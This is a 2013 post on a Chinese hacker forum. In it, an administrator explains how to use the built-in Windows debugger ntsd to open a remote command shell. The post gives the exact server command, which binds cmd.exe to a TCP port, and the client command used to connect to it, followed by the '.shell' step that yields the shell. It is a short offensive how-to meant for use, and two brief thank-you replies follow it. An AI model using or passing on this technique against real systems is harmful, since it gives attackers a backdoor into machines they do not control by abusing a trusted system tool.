搜索
查看: 871|回复: 2

利用系统自带的ntsd实现端口转发,本地获取shell

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2013-8-26 20:50:38 | 显示全部楼层 |阅读模式
Ntsd简介

ntsd从Windows 2000开始就是系统自带的进程调试工具,在system32目录下。NTSD的功能非常的强大,用法也比较复杂,但如果只用来结束一些进程,那就比较简单了。

微观:http://baike.baidu.com/link?url= ... c8O4hFS_GpOeB85Mitq
====================================================================

我们这次利用ntsd来实现利用系统自带的ntsd实现端口转发,本地获取shell

我们的服务器端执行


1
2
3
4
5


ntsd -server tcp:port=7777 cmd.exe


这里的cmd.exe只是获得一个宿主进程,当然mstsc.exe 、 calc.exe等等都是可以的

然后我们的电脑,也就是客户机运行

PHP

1
2
3
4
5


ntsd -remote tcp:server=服务器ip,port=7777


运行后会弹出一个窗口,我们输入.shell即可成功获得cmdshell

432

主题

573

帖子

2543

积分

核心成员

Rank: 8Rank: 8

积分
2543
发表于 2013-8-28 12:39:05 | 显示全部楼层
没看完~~~~~~ 先顶,好同志
专业回帖 该用户已被删除
发表于 2013-8-30 06:45:20 | 显示全部楼层
学习了,谢谢分享、、、
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表